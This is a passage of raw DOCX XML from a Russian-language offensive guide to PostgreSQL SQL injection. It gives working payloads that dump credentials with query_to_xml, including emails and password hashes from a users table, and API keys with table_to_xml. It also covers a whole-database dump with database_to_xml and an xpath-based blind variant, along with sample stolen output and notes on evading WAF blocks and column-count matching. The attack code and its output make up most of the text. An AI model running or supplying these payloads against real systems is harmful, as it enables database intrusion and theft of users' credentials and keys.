          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C6CE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query_to_xml(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C29B860" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        'SELECT id, email, password_hash FROM users LIMIT 50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792FD0A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        true, false, ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D022B05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )::text,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4739361C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    0 --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DD9B19" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sku</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP-ответа атакующий получает одно текстовое значение — XML-документ с 50 строками таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6894007F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;table xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E3F011" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D6D2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;id&gt;1&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD24F9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;email&gt;alice@example.com&lt;/email&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1844DB9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;password_hash&gt;$2b$12$abc...xyz&lt;/password_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A98B2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174CE3DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE56B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;id&gt;2&lt;/id&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E0DA75" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;email&gt;bob@example.com&lt;/email&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2994A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;password_hash&gt;$2b$12$def...uvw&lt;/password_hash&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C38451F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/row&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C0A588" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B2235" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/table&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C0FE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Аргументы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A5FFE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — произвольный SQL (SELECT). Здесь идёт настоящий запрос атакующего.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C155BB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nulls boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: NULL-значения сериализуются как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;col xsi:nil="true"/&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: NULL-колонки выкидываются из XML (теряются). Для разведки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> лучше — атакующий видит присутствие NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02EB8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tableforest boolean</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: один корень </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;table&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;row&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-детьми (как выше); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: серия независимых </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;row&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без корня (массив XML-фрагментов). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> удобнее для парсинга на стороне атакующего.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1393E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>targetns text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — XML namespace. Пустая строка — без namespace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E05A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Возврат функции — тип </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, который явно кастится в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для UNION-совместимости с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sku text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UNION упадёт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION types text and xml cannot be matched</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB6707" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Варианты той же функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183C5A73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`table_to_xml('schema.name'::regclass, true, false, '')`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — дампит указанную таблицу целиком, без LIMIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E66BEA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, table_to_xml('public.api_keys'::regclass, true, false, '')::text, 0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABD997" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Удобнее, когда нужна таблица «как есть» без специфичного WHERE/LIMIT, и атакующий уверен, что объём в HTTP-ответ поместится (несколько MB). Без LIMIT для большой таблицы — таймаут на стороне PG (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t>) или обрыв HTTP-ответа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C74B0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`database_to_xml(true, false, '')`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — дампит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>всю</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> БД (все таблицы, к которым у роли есть SELECT). На реальных БД это десятки MB — payload почти всегда упирается в HTTP-лимиты, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или OOM application-сервера. Реалистичен только на маленьких dev/test-кластерах. Полезен в очень узком сценарии: target — пустая или микро-БД (например, internal admin-инструмент с одной-двумя таблицами).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96F95A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`query_to_xmlschema(...)` / `table_to_xmlschema(...)`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — возвращают XSD-схему (без данных). Полезно для быстрой разведки структуры, если по какой-то причине </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1) заблокированы WAF: XSD содержит имена и типы колонок.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E8E46A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Обход подбора UNION-колонок через xpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188F6D82" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Альтернативный вариант, когда не получается подобрать число колонок UNION или их типы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168D424" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' AND 1 = (xpath('count(//row)', query_to_xml('SELECT email FROM users', true, false, '')))[1]::text::int --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F4098" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь результат query_to_xml парсится через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xpath()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.11.3) — payload может работать как boolean-blind (3.3) или error-based (3.2), не требуя UNION-канала. Это позволяет применять </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query_to_xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не только в SELECT-эндпоинтах, но и в любой точке инъекции, где можно вычислить выражение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217DE70E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий получает то же содержимое, что и через классическую UNION (3.1), но:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7615C3C6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Без подбора числа колонок</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — одна колонка результата (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xml::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) подгоняется под любую </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-колонку исходного SELECT. Это критично, если WAF блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
